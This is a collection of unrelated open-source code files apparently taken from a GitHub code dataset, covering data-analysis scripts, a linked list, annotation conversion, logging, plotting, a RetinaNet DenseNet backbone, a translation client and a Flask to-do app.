check_missing_col(train)\nprint(missing_col)\n\n#결측치가 존재하는 항목들이 범주형인지 수치형인지 확인\n#print(train['workclass'].unique())\n#print(train['occupation'].unique())\n#print(train['native.country'].unique())\n\n#결측치를 가진 모든 데이터가 범주형이기 때문에 범주형 데이터에 한해서는 행을 삭제해도 됨\ndef handle_na(data, missing_col):\n temp = data.copy()\n for col, dtype in missing_col:\n if dtype == 'O':\n # 범주형 feature가 결측치인 경우 해당 행들을 삭제해 주었습니다.\n temp = temp.dropna(subset=[col])\n return temp\n\ntrain = handle_na(train, missing_col)\nmissing_col = check_missing_col(train)\nprint(missing_col)\n\n#target을 소득 기준으로 재 정의\ntrain['target'] = train['target'].apply(lambda x : '<=50K' if x == 0 else '>50K' )\n\n#5만 달러 이하인지 초과인지 각각 클래스 분포 확인\ncounted_values = train['target'].value_counts()\nplt.style.use('ggplot')\nplt.figure(figsize = (12,10))\nplt.title('class counting', fontsize = 30)\nvalue_bar_ax = sns.barplot(x=counted_values.index, y=counted_values)\nvalue_bar_ax.tick_params(labelsize=20)\n#plt.show()\n\nprint(train.info())\n\n#범주형 피처 데이터를 시각화 하기 위해 범주형 피처만을 가진 데이터 프레임을 생성\ntrain_categori = train.drop(['id', 'age', 'fnlwgt', 'education.num', 'capital.gain', 'capital.loss', 'hours.per.week'],axis = 1) #범주형이 아닌 피쳐 drop\n\n#범주형 데이터 분포를 확인해보자\ndef visualize(axx, field, num): ##그래프를 그리기 위한 메소드\n sns.countplot(train_categori.columns[num], data= train_categori[train_categori['target'] == field], color='#eaa18a', ax = axx) # countplot을 이용하여 그래프를 그려줍니다.\n axx.set_title(field)\n\nfigure, ((ax1,ax2),(ax3,ax4), (ax5, ax6),(ax7, ax8), (ax9, ax10),\n (ax11,ax12),(ax13,ax14), (ax15, ax16)) = plt.subplots(nrows=8, ncols=2) ## 원하는 개수의 subplots 만들어주기\nfigure.set_size_inches(40, 50) #(w,h)\nfigure.suptitle('Compare categorical features', fontsize=40, y = 0.9)\n\nk = 0 # 피쳐 수\nj = 1 # 그래프 수\nwhile k<8:\n for i in range(0,2):\n visualize(eval(f'ax{j}'), train_categori['target'].unique()[i], k)\n j = j+1\n k = k+1\n\nplt.show()\n\n\n# 수치형 데이터 분포 확인\ntrain_numeric = train[['age', 'fnlwgt', 'capital.gain', 'capital.loss', 'hours.per.week', 'target']] #수치형 피쳐와 label인 target 추출\n\ndef visualize(axx, field, num):\n line = train_numeric[train_numeric['target'] == field] #메소드에서 target 클래스 추춣\n name = train_numeric[train_numeric['target'] == field][train_numeric.columns[num]].name #메소드에서 이름 추출\n sns.kdeplot(x = line[train_numeric.columns[num]], data = train_numeric, ax = axx, color='#eaa18a') #countplot을 이용하여 그래프를 그려줍니다.\n axx.axvline(line.describe()[name]['mean'], c='#f55354', label = f\"mean = {round(line.describe()[name]['mean'], 2)}\") #mean 통계값을 표기해줍니다.\n axx.axvline(line.describe()[name]['50%'], c='#518d7d', label = f\"median = {round(line.describe()[name]['50%'], 2)}\") #median 통계값을 표기해줍니다.\n axx.legend()\n axx.set_title(field)\n\nfigure, ((ax1,ax2),(ax3,ax4), (ax5, ax6),(ax7, ax8), (ax9, ax10)) = plt.subplots(nrows=5, ncols=2) ##원하는 개수의 subplots 만들어주기\nfigure.set_size_inches(40, 50) #(w,h)\nfigure.suptitle('Compare numeric features', fontsize=40, y = 0.9)\n\nk = 0 # 피쳐 수\nj = 1 # 그래프 수\nwhile k<5:\n for i in range(0,2):\n visualize(eval(f'ax{j}'), train_numeric['target'].unique()[i], k)\n j = j+1\n k = k+1\n\nplt.show(block=True)\n\n\n#상관관계\nplt.style.use('ggplot')\nplt.figure(figsize=(12, 10))\nplt.title('capital gain and working time', fontsize = 30)\nsns.scatterplot(x = 'capital.gain', y= 'hours.per.week', hue= 'target', data= train[train['capital.gain'] > 0]) #산포도를 확실하게 차이나도록 시각화 해주기 위하여 capital.gain에서 0값을 제외\n\nplt.style.use('ggplot')\nplt.figure(figsize=(12, 10))\nplt.title('capital gain and working time', fontsize = 30)\nsns.scatterplot(x = 'age', y= 'capital.loss', hue= 'target', data= train[train['capital.loss'] > 0]) #산포도를 확실하게 차이나도록 시각화 해주기 위하여 capital.loss에서 0값을 제외","repo_name":"kumakuma34/Dacon_-","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"25996290720","text":"# В большой текстовой строке подсчитать количество встречаемых\n# слов и вернуть 10 самых частых. Не учитывать знаки препинания\n# и регистр символов. За основу возьмите любую статью\n# из википедии или из документации к языку.\n\nwith open('constitution.txt', 'r', encoding='UTF-8') as file:\n text = file.read()\n\n# Удаляем все символы кроме букв и пробелов. Перводим всё в нижний регистр.\ntext_new = ''\nfor i in text:\n if i.isalpha() or i.isspace():\n text_new += i.lower()\n\n# Делаем список слов и множество уникальных слов в тексте\nwords = text_new.split()\nset_words = set(words)\n\n# Создаем словарь и подсчитываем частоту слов\ndict_words = {}\nfor i in set_words:\n dict_words.setdefault(i, words.count(i))\n\n# Сортируем словарь по количеству повторений слов\nsorted_dict = dict(sorted(dict_words.items(), reverse=True, key=lambda item: item[1]))\n\n# Выводим 10 наиболее часто втречающихся слов\niterations = 0 \nfor key, value in sorted_dict.items():\n print(f'{key:>15} - {value}')\n iterations += 1\n \n if iterations == 10:\n break\n","repo_name":"Narendill/Python","sub_path":"HW-3/Task-2-HW.py","file_name":"Task-2-HW.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"16575007021","text":"class Node:\n\n def __init__(self, data: int):\n\n self.data = data;\n self.next = None;\n\n\nclass LinkedList(Node):\n\n def __init__(self, data: int):\n\n self.head = Node(data)\n\n def insertAtHead(self, item: int):\n\n headNode = self.head\n self.head = Node(item)\n self.head.next = headNode\n\n return\n\n def insertAtTail(self, item: int):\n\n if self.head == None:\n self.insertAtHead(item)\n return\n\n currentNode = self.head\n while currentNode.next != None:\n currentNode = currentNode.next\n\n currentNode.next = Node(item)\n\n return\n\n def remove(self, item: int):\n\n if self.head.data == item:\n\n self.head = self.head.next\n return\n\n previousNode = self.head\n currentNode = self.head.next\n\n while currentNode != None:\n\n if currentNode.data == item:\n\n previousNode.next = currentNode.next\n return\n\n previousNode = previousNode.next\n currentNode = currentNode.next\n\n return\n\n def printList(self):\n\n currentNode = self.head\n\n while currentNode != None:\n\n print(currentNode.data, end = \" -> \")\n currentNode = currentNode.next\n\n print(\"NULL\")\n\n return\n","repo_name":"Rushali-Sarkar/data-structures-algorithms","sub_path":"algorithms/linkedlist/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42875489410","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 1 15:47:15 2019\n\n@author: johan\n\n\nThis script converts the xml annotations created by the image-preprocessing\nscript into csv annotations which can then be converted into tf record files\nby the generate_tfrecord script.\n\"\"\"\n\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\n\n\ndef xml_to_csv(input_folder, output_path, flowers_to_use=None):\n \"\"\"Iterates through all .xml files in the input_folder and combines them in a single Pandas datagrame.\n\n Parameters:\n input_folder (str): path to the input folder containing all images and\n xml annotation files\n output_path (str): path to the output csv file.\n flowers_to_use (list): a list of strings containing flower names. Only\n the annotations with flowernames present in the flowers_to_use list\n are copied to the output csv file. If flowers_tu_use is None, all\n annotations are used.\n \n Returns:\n Pandas datagrame of the csv list.\n \n \"\"\"\n\n xml_list = []\n for xml_file in glob.glob(input_folder + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for member in root.findall('object'):\n if flowers_to_use == None or member[0].text in flowers_to_use:\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n member[0].text,\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text)\n )\n xml_list.append(value)\n column_name = ['filename', 'width', 'height',\n 'class', 'xmin', 'ymin', 'xmax', 'ymax']\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n xml_df.to_csv(output_path, index=None)\n return xml_df\n\n\n\n\nif __name__ == '__main__':\n print(\"Please use the command line interface and run the image-preprocessing command.\")\n","repo_name":"gallmann/Phenotator-Toolbox","sub_path":"Tensorflow/utils/xml_to_csv.py","file_name":"xml_to_csv.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"5684135833","text":"from pathlib import Path\nfrom logging.handlers import TimedRotatingFileHandler\nimport logging\n\n\ndef setup_logger(file_name):\n monster_path = Path(__file__).resolve().parent.parent\n log_format = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n \n logger = logging.getLogger(file_name)\n formatter = logging.Formatter(log_format)\n\n log_handler = TimedRotatingFileHandler(filename=f'{monster_path}/log/monster.log', when=\"midnight\", interval=1, backupCount=7)\n log_handler.setLevel(logging.ERROR)\n log_handler.setFormatter(formatter)\n\n if not logger.handlers:\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.ERROR)\n stream_handler.setFormatter(formatter)\n\n logger.addHandler(stream_handler)\n logger.addHandler(log_handler)\n\n return logger\n\n\ndef get_logger(file_name):\n return setup_logger(file_name)\n","repo_name":"nsfcac/MonSter","sub_path":"monster/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"65"} +{"seq_id":"25299126182","text":"# Python distribution modules\nfrom math import sqrt, ceil\n\n# Community modules\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import axhline\nfrom mpl_toolkits.mplot3d import axes3d\nfrom numpy import arange\nfrom pyEDM import ComputeError\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotEmbedDimension( df, args ):\n title = args.inputFile + \"\\nTp=\" + str(args.Tp)\n\n ax = df.plot( 'E', 'rho', title = title, linewidth = 3 )\n ax.set( xlabel = \"Embedding Dimension\",\n ylabel = \"Prediction Skill ρ\" )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotPredictNonlinear( df, args ):\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E )\n\n ax = df.plot( 'Theta', 'rho', title = title, linewidth = 3 )\n ax.set( xlabel = \"S-map Localisation (θ)\",\n ylabel = \"Prediction Skill ρ\" )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotPredictInterval( df, args ):\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E )\n\n ax = df.plot( 'Tp', 'rho', title = title, linewidth = 3 )\n ax.set( xlabel = \"Forecast Interval\",\n ylabel = \"Prediction Skill ρ\" )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef Plot3D( D, columnList, args ):\n\n fig = plt.figure()\n ax = fig.add_subplot( projection = '3d' )\n\n X, Y, Z = D[ columnList[0] ], \\\n D[ columnList[1] ], \\\n D[ columnList[2] ]\n\n # Plot\n if args.scatter :\n # s: marker size in points**2\n # c: marker colors\n ax.scatter( X, Y, Z, zdir = 'z', s = 20, c = None, depthshade = True )\n else :\n ax.plot( X, Y, Z )\n ax.set_xlabel( columnList[0] )\n ax.set_ylabel( columnList[1] )\n ax.set_zlabel( columnList[2] )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotCCM( libMeans, args ):\n title = args.inputFile + \"\\nE=\" + str( args.E )\n\n ax = libMeans.plot( 'LibSize',\n [ libMeans.columns[1], libMeans.columns[2] ],\n title = title, linewidth = 3 )\n ax.set( xlabel = \"Library Size\", ylabel = \"Cross Map ρ\" )\n axhline( y = 0, linewidth = 1 )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotObsPred_( df, args ):\n\n # stats: {'MAE': 0., 'RMSE': 0., 'rho': 0. }\n stats = ComputeError( df['Observations'], df['Predictions' ] )\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E ) + \" Tp=\" + str( args.Tp ) +\\\n \" ρ=\" + str( round( stats['rho'], 2 ) ) +\\\n \" RMSE=\" + str( round( stats['RMSE'], 2 ) )\n\n df.plot( df.columns[0], ['Observations', 'Predictions'],\n title = title, linewidth = 3 )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotCoeff_( df, args ):\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E ) + \" Tp=\" + str( args.Tp ) +\\\n \" S-Map Coefficients\"\n\n time_col = df.columns[0]\n # Coefficient columns can be in any column\n coef_cols = [ x for x in df.columns if time_col not in x ]\n\n df.plot( time_col, coef_cols, title = title, linewidth = 3,\n subplots = True )\n\n#----------------------------------------------------------------------------\n#\n#----------------------------------------------------------------------------\ndef PlotMutualInfo( df, args ):\n\n colNames = df.columns # lag, MI[v1:v2]..., CC[v1:v2]\n lags = df.loc[ :,'lag' ]\n\n numVars = len( args.columns )\n nRowCol = ceil( sqrt( numVars ) )\n\n # If numVars > 1, create a square matrix subplot\n fig, axs = plt.subplots( nRowCol, nRowCol )\n\n title = 'Mutual Info & Correlation nn:' + str( args.MI_neighbors )\n fig.suptitle( title )\n\n if numVars == 1 :\n axs.plot( lags, df.iloc[ :, 1 ], label = 'MI' )\n axs.plot( lags, df.iloc[ :, 2 ], label = 'CC' )\n axs.legend()\n axs.set_title( args.columns[ 0 ] + \":\" + args.target, y = 0 )\n else:\n MI_cols = range( 1, numVars + 1 )\n CC_cols = range( numVars + 1, 2 * numVars + 1 )\n k = 0\n for i in range( nRowCol ) :\n if k >= numVars :\n break\n\n for j in range( nRowCol ) :\n ax = axs[i,j]\n ax.plot( lags, df.loc[ :, colNames[MI_cols[k]] ], label='MI' )\n ax.plot( lags, df.loc[ :, colNames[CC_cols[k]] ], label='CC' )\n ax.legend()\n ax.set_title( args.columns[ k ] + \":\" + args.target,y=0 )\n\n k = k + 1\n\n if k >= numVars :\n break\n","repo_name":"SugiharaLab/jpyEDM","sub_path":"src/PlotFunctions.py","file_name":"PlotFunctions.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"65"} +{"seq_id":"27180124822","text":"import re\nimport logging\nfrom pkg_resources import working_set\nfrom tg import config\nfrom tg.i18n import ugettext as _\nfrom vigilo.turbogears.controllers import BaseController\n\nLOGGER = logging.getLogger(__name__)\n\nclass CustomController(BaseController):\n \"\"\"\n Un contrôleur qui facilite l'ajout d'extensions / personnalisations\n par des développeurs tiers.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialise le contrôleur en lui ajoutant dynamiquement\n des attributs (sous-contrôleurs), en fonction des points\n d'entrée définis dans le groupe \".controllers\".\n \"\"\"\n app_name = str(config.get('app_name')).lower()\n group = '%s.controllers' % app_name\n LOGGER.debug(\"Loading custom controllers\")\n for ep in working_set.iter_entry_points(group):\n if not re.match('^[a-z][a-z0-9_]*$', ep.name, re.I):\n LOGGER.warning(_(\"Not a valid controller name: %s\"), ep.name)\n else:\n ctrl = ep.load()\n if issubclass(ctrl, BaseController):\n LOGGER.debug(\"Added custom controller '%s'\" % ep.name)\n setattr(self, ep.name, ctrl())\n else:\n base_ctrl = \"%s.%s\" % (BaseController.__module__,\n BaseController.__name__)\n ep_path = \"%s.%s\" % (ep.module_name, ep.attrs[0])\n LOGGER.warning(\n _(\"%(entry)s is not a subclass of %(base)s\"),\n {\n 'base': base_ctrl,\n 'entry': ep_path,\n })\n super(CustomController, self).__init__(*args, **kwargs)\n","repo_name":"vigilo/turbogears","sub_path":"src/vigilo/turbogears/controllers/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"fr","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"22558018943","text":"import os\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nimport pymel.core as pm\n\n\nclass ScreenCapture(QtWidgets.QDialog):\n \"\"\"\n sc = ScreenCapture()\n sc.show()\n \"\"\"\n def __init__(self, parent=None):\n super(ScreenCapture, self).__init__(parent)\n\n self.startPos = None\n self.lastSelRectWidth = None\n\n self.capturedPixmap = None\n self.desktopPixmap = None\n self.selectedRect = QtCore.QRect()\n\n self.setGeometry(QtWidgets.QApplication.desktop().geometry())\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n self.captureDesktop()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n painter.drawPixmap(0, 0, self.desktopPixmap)\n\n pen = QtGui.QPen(QtCore.Qt.red, 3)\n painter.setPen(pen)\n\n path = QtGui.QPainterPath()\n path.addRect(self.rect())\n path.addRect(self.selectedRect)\n painter.fillPath(path, QtGui.QColor.fromRgb(255, 255, 255, 100))\n\n painter.drawRect(self.selectedRect)\n\n def mousePressEvent(self, event):\n posInWin = self.window().mapFromGlobal(event.globalPos())\n self.startPos = posInWin\n self.selectedRect.setTopLeft(posInWin)\n\n def mouseMoveEvent(self, event):\n posInWin = self.window().mapFromGlobal(event.globalPos())\n\n if event.modifiers() == QtCore.Qt.Key_Escape:\n self.ignore()\n\n if event.modifiers() == QtCore.Qt.ShiftModifier:\n width = posInWin.x() - self.startPos.x()\n squareBtmRightPos = QtCore.QPoint(self.startPos.x()+width, self.startPos.y()+width)\n self.selectedRect.setBottomRight(squareBtmRightPos)\n self.lastSelRectWidth = width\n elif event.modifiers() == (QtCore.Qt.ShiftModifier | QtCore.Qt.AltModifier):\n topLeftPos = QtCore.QPoint(posInWin.x()-self.lastSelRectWidth, posInWin.y()-self.lastSelRectWidth)\n self.selectedRect.setTopLeft(topLeftPos)\n self.selectedRect.setBottomRight(posInWin)\n self.startPos = topLeftPos\n else:\n self.selectedRect.setBottomRight(posInWin)\n\n self.update()\n\n def mouseReleaseEvent(self, event):\n self.capturedPixmap = self.desktopPixmap.copy(self.selectedRect.normalized())\n self.capturedPixmap.save('D:/test.png', 'PNG')\n self.accept()\n\n def captureDesktop(self):\n screenGeometry = QtCore.QRect(QtWidgets.QApplication.primaryScreen().virtualGeometry())\n self.desktopPixmap = QtGui.QPixmap.grabWindow(\n QtWidgets.QApplication.desktop().winId(),\n screenGeometry.x(),\n screenGeometry.y(),\n screenGeometry.width(),\n screenGeometry.height(),\n )\n\n\ndef duplicateImage(imagePath, suffix='_copy'):\n folder = os.path.dirname(imagePath)\n origFileName, ext = os.path.splitext(os.path.basename(imagePath))\n newFileName = '{}{}{}'.format(origFileName, suffix, ext)\n newImagePath = os.path.join(folder, newFileName)\n\n qimg = QtGui.QImage(imagePath)\n qimg.save(newImagePath, ext.strip('.'))\n\n\ndef editScriptEditorHorizontal():\n panel = None\n allPanels = pm.getPanel(all=True)\n for item in allPanels:\n if \"scriptEditorPanel\" in item:\n panel = item\n\n if not panel:\n print(\"Not found script editor panel.\")\n return\n\n qtpanel = panel.asQtObject()\n\n menuBar, mainWidget = qtpanel.children()[1:]\n\n seww = mainWidget.layout().itemAt(1).widget()\n sewww = seww.children()[-1]\n\n splitter = sewww.children()[1]\n splitter.setOrientation(QtCore.Qt.Orientation.Horizontal)\n\n script_console = splitter.widget(0)\n script_editor = splitter.widget(1)\n\n splitter.insertWidget(0, script_editor)\n\n se_splitter = script_editor.children()[1]\n\n editor = se_splitter.children()[1]\n tabWidget = editor.children()[1]\n\n tabWidget.setTabPosition(QtWidgets.QTabWidget.TabPosition.North)\n","repo_name":"LEESANGTAK/takTools","sub_path":"scripts/takTools/utils/qtUtil.py","file_name":"qtUtil.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42580864473","text":"from tensorflow import keras\n\nfrom . import retinanet\nfrom . import Backbone\nfrom ..utils.image import preprocess_image\n\n\nallowed_backbones = {\n 'densenet121': ([6, 12, 24, 16], keras.applications.densenet.DenseNet121),\n 'densenet169': ([6, 12, 32, 32], keras.applications.densenet.DenseNet169),\n 'densenet201': ([6, 12, 48, 32], keras.applications.densenet.DenseNet201),\n}\n\n\nclass DenseNetBackbone(Backbone):\n \"\"\" Describes backbone information and provides utility functions.\n \"\"\"\n\n def retinanet(self, *args, **kwargs):\n \"\"\" Returns a retinanet model using the correct backbone.\n \"\"\"\n return densenet_retinanet(*args, backbone=self.backbone, **kwargs)\n\n def download_imagenet(self):\n \"\"\" Download pre-trained weights for the specified backbone name.\n This name is in the format {backbone}_weights_tf_dim_ordering_tf_kernels_notop\n where backbone is the densenet + number of layers (e.g. densenet121).\n For more info check the explanation from the keras densenet script itself:\n https://github.com/keras-team/keras/blob/master/keras/applications/densenet.py\n \"\"\"\n origin = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.8/'\n file_name = '{}_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n # load weights\n if keras.backend.image_data_format() == 'channels_first':\n raise ValueError('Weights for \"channels_first\" format are not available.')\n\n weights_url = origin + file_name.format(self.backbone)\n return keras.utils.get_file(file_name.format(self.backbone), weights_url, cache_subdir='models')\n\n def validate(self):\n \"\"\" Checks whether the backbone string is correct.\n \"\"\"\n backbone = self.backbone.split('_')[0]\n\n if backbone not in allowed_backbones:\n raise ValueError('Backbone (\\'{}\\') not in allowed backbones ({}).'.format(backbone, allowed_backbones.keys()))\n\n def preprocess_image(self, inputs):\n \"\"\" Takes as input an image and prepares it for being passed through the network.\n \"\"\"\n return preprocess_image(inputs, mode='tf')\n\n\ndef densenet_retinanet(num_classes, backbone='densenet121', inputs=None, modifier=None, **kwargs):\n \"\"\" Constructs a retinanet model using a densenet backbone.\n\n Args\n num_classes: Number of classes to predict.\n backbone: Which backbone to use (one of ('densenet121', 'densenet169', 'densenet201')).\n inputs: The inputs to the network (defaults to a Tensor of shape (None, None, 3)).\n modifier: A function handler which can modify the backbone before using it in retinanet (this can be used to freeze backbone layers for example).\n\n Returns\n RetinaNet model with a DenseNet backbone.\n \"\"\"\n # choose default input\n if inputs is None:\n inputs = keras.layers.Input((None, None, 3))\n\n blocks, creator = allowed_backbones[backbone]\n model = creator(input_tensor=inputs, include_top=False, pooling=None, weights=None)\n\n # get last conv layer from the end of each dense block\n layer_outputs = [model.get_layer(name='conv{}_block{}_concat'.format(idx + 2, block_num)).output for idx, block_num in enumerate(blocks)]\n\n # create the densenet backbone\n # layer_outputs contains 4 layers\n model = keras.models.Model(inputs=inputs, outputs=layer_outputs, name=model.name)\n\n # invoke modifier if given\n if modifier:\n model = modifier(model)\n\n # create the full model\n backbone_layers = {\n 'C2': model.outputs[0],\n 'C3': model.outputs[1],\n 'C4': model.outputs[2],\n 'C5': model.outputs[3]\n }\n\n model = retinanet.retinanet(inputs=inputs, num_classes=num_classes, backbone_layers=backbone_layers, **kwargs)\n\n return model\n","repo_name":"OlafenwaMoses/ImageAI","sub_path":"imageai_tf_deprecated/Detection/keras_retinanet/models/densenet.py","file_name":"densenet.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":8143,"dataset":"github-code","pt":"65"} +{"seq_id":"35681189324","text":"\"\"\"Translation client common functions\n\nModified opennmt-tf example using some ideas from\ntensorflow serving mnist example.\n.\"\"\"\n\nfrom __future__ import print_function\nimport tensorflow as tf\n\nfrom tensorflow_serving.apis import predict_pb2\n\nimport codecs\n\n\ndef parse_translation_result(result, sentence_processor):\n \"\"\"Parses a translation result.\n\n Args:\n result: A `PredictResponse` proto.\n sentence_processor: A `sentencepiece.SentenceProcessor`\n\n Returns:\n A result string\n \"\"\"\n lengths = tf.make_ndarray(result.outputs[\"length\"])[0]\n hypotheses = tf.make_ndarray(result.outputs[\"tokens\"])[0]\n\n # Only consider the first hypothesis (the best one).\n best_hypothesis = hypotheses[0]\n best_length = lengths[0]\n model_out = best_hypothesis[0:best_length - 1] # Ignore \n pieces = sentence_processor.DecodePieces(list(model_out))\n return codecs.decode(pieces)\n\n\ndef translate(stub, model_name, sentence_processor,\n input_string, timeout=5.0):\n \"\"\"Translates a sequence of tokens.\n\n Args:\n stub: The prediction service stub.\n model_name: The model to request.\n sentence_processor: A `sentencepience.SentenceProcessor`\n input_string: The input string\n timeout: Timeout after this many seconds.\n\n Returns:\n A future.\n \"\"\"\n tokens = sentence_processor.EncodeAsPieces(input_string)\n length = len(tokens)\n\n request = predict_pb2.PredictRequest()\n request.model_spec.name = model_name\n request.inputs[\"tokens\"].CopyFrom(\n tf.make_tensor_proto([tokens], shape=(1, length)))\n request.inputs[\"length\"].CopyFrom(\n tf.make_tensor_proto([length], shape=(1,)))\n\n return stub.Predict.future(request, timeout)\n","repo_name":"avinashvarna/sanskrit_nmt","sub_path":"sandhi_split/transformer_small_vocab/client_common.py","file_name":"client_common.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"65"} +{"seq_id":"73440596686","text":"from flask import Blueprint, render_template, redirect, request\nfrom app.db import db\n# from app.models.task import Task\nfrom datetime import datetime\nfrom bson.objectid import ObjectId\nfrom bson import json_util\nimport json\nfrom pymongo import ReturnDocument\n\ntask_router = Blueprint(\"task_router\", __name__)\n\n#\n# Inicio de las rutas del app (sección tareas):\n#\n@task_router.route(\"/\")\ndef index():\n # task_list = Task.query.all() # SELECT * FROM task\n tasks = db.tasks.find()\n task_list = list(tasks)\n return render_template(\"index.html\", lista_tareas=task_list)\n\n@task_router.route(\"/add\", methods=[\"POST\"])\ndef add():\n task_text = request.form.get(\"text\") # Recupero lo que viene en el input del form\n if task_text == \"\" or task_text == None:\n return redirect(\"/\")\n \n newTask = {\n \"text\": task_text,\n \"createdAt\": datetime.now(),\n \"doneAt\": None,\n \"deletedAt\": None,\n }\n db.tasks.insert_one(newTask)\n\n # newTask = Task(text=task_text, createdAt=datetime.now())\n # db.session.add(newTask) # Por dentro creará el SQL COMMAND: INSERT\n # db.session.commit() # Envia los SQL COMMAND al motor de DB.\n return redirect(\"/\")\n\n\n@task_router.route(\"/update/\", methods=[\"PUT\"])\ndef update(id):\n # task = Task.query.get(id)\n text = request.form.get(\"text\")\n task = db.tasks.find_one_and_update({'_id':ObjectId(id)}, {\"$set\": {\"text\": text}}, upsert=False, return_document=ReturnDocument.AFTER)\n return parse_json(task), 200\n\ndef parse_json(data):\n return json.loads(json_util.dumps(data))\n\n\n@task_router.route(\"/task\", defaults={'id': None})\n@task_router.route(\"/task/\", defaults={'id': None})\n@task_router.route(\"/task/\")\n\ndef task(id = None):\n # Si no me envias un ID, te regreso a index:\n if id == None:\n return redirect(\"/\")\n # Si me envias un ID entonces trato de extraer la tarea con ese ID:\n # task = Task.query.get(id)\n task = db.tasks.find_one(ObjectId(id))\n print(task['text'])\n if task == None:\n return redirect(\"/\")\n # Si la tarea NO ESTA VACIA = la encontré. Entonces se la mando al template:\n return render_template(\"detail.html\", task=task)\n\n@task_router.route(\"/done\", methods=[\"POST\"])\ndef done():\n task_id = request.form.get(\"id\")\n next = request.form.get(\"next\")\n task = db.tasks.find_one_and_update({'_id':ObjectId(task_id)}, {\"$set\": {\"doneAt\": datetime.now()}}, upsert=False, return_document=ReturnDocument.AFTER)\n # task = Task.query.get(task_id)\n if task == None:\n return redirect(\"/\")\n # # Si existe la tarea:\n # task.doneAt = datetime.now()\n # db.session.commit()\n # finish:\n if next != None:\n return redirect(next)\n return redirect(\"/task/\" + str(task_id))\n\n@task_router.route(\"/delete/\")\ndef delete(id):\n task = db.tasks.find_one_and_update({'_id':ObjectId(id)}, {\"$set\": {\"deletedAt\": datetime.now()}}, upsert=False, return_document=ReturnDocument.AFTER)\n # task = Task.query.get(id)\n if task == None:\n return redirect(\"/\")\n # Si existe la tarea:\n # task.deletedAt = datetime.now()\n # db.session.commit()\n return redirect(\"/task/\" + str(id))","repo_name":"bdiazc90/flask-todoapp-sqlite","sub_path":"app/routes/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"65"} +{"seq_id":"40009552580","text":"from tkinter.constants import X\nfrom matplotlib.animation import AVConvFileWriter\nimport numpy as np\nfrom numpy import linalg as LA\n\nGaussianBasisSigma = 0.5\n\ndef groundTruthProcess(x, bias = 0.0, func = 'sin(2pix)'):\n \"\"\"Computes underlying function 'func' we wish to discover.\n \n @param x N-dimentional vector of input data.\n @param bias bias of the function.\n @param func true function itself.\n\n @return N-dimentional target vector of function values.\n \"\"\"\n\n if func == 'sin(2pix)':\n return bias + np.sin(2*np.pi*x)\n elif func == 'x+0.3sin(2pix)':\n return x + 0.3 * np.sin(2*np.pi*x)\n elif func == 'exp(x)':\n return bias + np.exp(x)\n elif func == 'x^2':\n return bias + x**2\n elif func == '|x|':\n return bias + np.abs(x)\n elif func == 'H(x)':\n return bias + np.heaviside(x, 0.5)\n \n return bias + np.sin(2*np.pi*x)\n\ndef generateData(N, low = -1.0, high = 1.0, func = 'sin(2pix)', bias = 0.0, noise_level = 0.3):\n \"\"\"Generates data from some stochastic process (governed by \"groundTruthProcess\" function) with gaussian noise.\n \n @param N desierd number of 